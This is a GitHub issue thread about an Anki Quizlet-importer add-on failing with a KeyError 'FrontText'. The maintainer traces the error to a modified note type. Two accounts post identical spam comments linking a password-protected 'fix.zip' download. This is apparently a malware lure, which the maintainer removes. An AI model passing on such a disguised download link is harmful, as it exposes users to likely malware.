### ISSUE TITLE
Can't import flashcards in any way

### ISSUE THREAD

**Issue by tommy-thinh** [sviatoslav-lebediev/anki-quizlet-importer-extended#196]
**Describe the bug**
Hi, your add-on run smoothly for some first flashcards that I import to Anki. However, after I have imported some decks, it always produce some errors. 
My version is `Version ⁨24.06.3 (d678e393)⁩, Python 3.9.18 Qt 6.6.2 PyQt 6.6.1`. 

**Quizlet deck URL**
Here is the [URL](https://quizlet.com/vn/923502000/key-signatures-flash-cards/) of my deck in Quizlet.

**Additional context**
Here is the debug info: 
Anki 24.06.3 (d678e393)  (ao)
Python 3.9.18 Qt 6.6.2 PyQt 6.6.1
Platform: Windows-10-10.0.19045

Traceback (most recent call last):
  File "anki.notes", line 154, in _field_index
KeyError: 'FrontText'

The above exception was the direct cause of the following exception:

Traceback (most recent call last):
  File "C:\Users\PHUC THINH\AppData\Roaming\Anki2\addons21\1362209126\__init__.py", line 384, in onCode
    self.createDeck(deck)
  File "C:\Users\PHUC THINH\AppData\Roaming\Anki2\addons21\1362209126\__init__.py", line 431, in createDeck
    note["FrontText"] = item["term"]
  File "anki.notes", line 162, in __setitem__
  File "anki.notes", line 156, in _field_index
KeyError: 'FrontText'

===Add-ons (active)===
(add-on provided name [Add-on folder, installed at, version, is config changed])
Quizlet to Anki 21 Importer with audio support ['1362209126', 2024-01-16T01:55, 'None', '']

===IDs of active AnkiWeb add-ons===
1362209126

===Add-ons (inactive)===
(add-on provided name [Add-on folder, installed at, version, is config changed])

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by tommy-thinh** [comment]
What are these?

**Comment by sviatoslav-lebediev** [comment]
> What are these?

I don't know what was that, I've removed that file

**Comment by sviatoslav-lebediev** [comment]
@tommy-thinh please take a look at https://github.com/sviatoslav-lebediev/anki-quizlet-importer-extended/wiki/FAQ
4th item
99% you have changed Basic Quizlet Extended note type
